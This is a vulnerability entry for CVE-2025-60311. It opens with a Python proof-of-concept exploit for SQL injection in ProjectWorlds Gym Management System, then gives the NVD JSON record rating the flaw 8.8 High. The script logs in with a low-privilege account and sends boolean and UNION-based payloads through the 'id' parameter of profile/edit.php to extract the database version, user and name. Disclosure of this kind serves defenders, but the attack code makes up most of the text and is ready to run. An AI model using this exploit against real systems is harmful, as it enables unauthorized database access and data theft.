CVE-2025-60311

# CVE-2025-60311 - ProjectWorlds Gym Management System SQL Injection PoC # Vulnerable endpoint: profile/edit.php # Vulnerable parameter: id import requests # Target configuration TARGET_URL = "http://target-site.com" LOGIN_URL = f"{TARGET_URL}/login.php" EDIT_URL = f"{TARGET_URL}/profile/edit.php" # Attacker credentials (requires low privilege account) USERNAME = "attacker_user" PASSWORD = "attacker_password" # Create session to maintain cookies session = requests.Session() # Step 1: Login to obtain authenticated session login_data = { "username": USERNAME, "password": PASSWORD } session.post(LOGIN_URL, data=login_data) # Step 2: SQL Injection payload via 'id' parameter # Basic boolean-based injection to verify vulnerability sql_payload = "1' OR '1'='1" # Step 3: Send the malicious request params = { "id": sql_payload } response = session.get(EDIT_URL, params=params) # Step 4: Check response for SQL errors or data leakage if "SQL" in response.text or "syntax" in response.text.lower(): print("[+] Target is vulnerable to SQL Injection!") else: print("[*] Response received, analyze manually") # Step 5: Union-based injection to extract database info union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" response = session.get(EDIT_URL, params={"id": union_payload}) print(response.text) # Step 6: Extract database version and current user info_payload = "1' UNION SELECT version(),user(),database(),4,5,6,7,8,9,10-- -" response = session.get(EDIT_URL, params={"id": info_payload}) print(f"[+] Database info: {response.text}")

{"cve": {"id": "CVE-2025-60311", "sourceIdentifier": "[email protected]", "published": "2025-10-08T20:15:35.690", "lastModified": "2025-10-16T15:27:57.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjectWorlds Gym Management System1.0 is vulnerable to SQL Injection via the \"id\" parameter in the profile/edit.php page"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "CB389A7F-D281-4799-A3B2-8E429723BE65"}]}]}], "references": [{"url": "https://github.com/ChuckBartowski7/Vulnerability-Research/blob/main/CVE-2025-60311/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/projectworldsofficial/Gym-Management-System-Project-in-PHP", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://youtu.be/J_7G_AahgSw", "source": "[email protected]", "tags": ["Exploit"]}]}}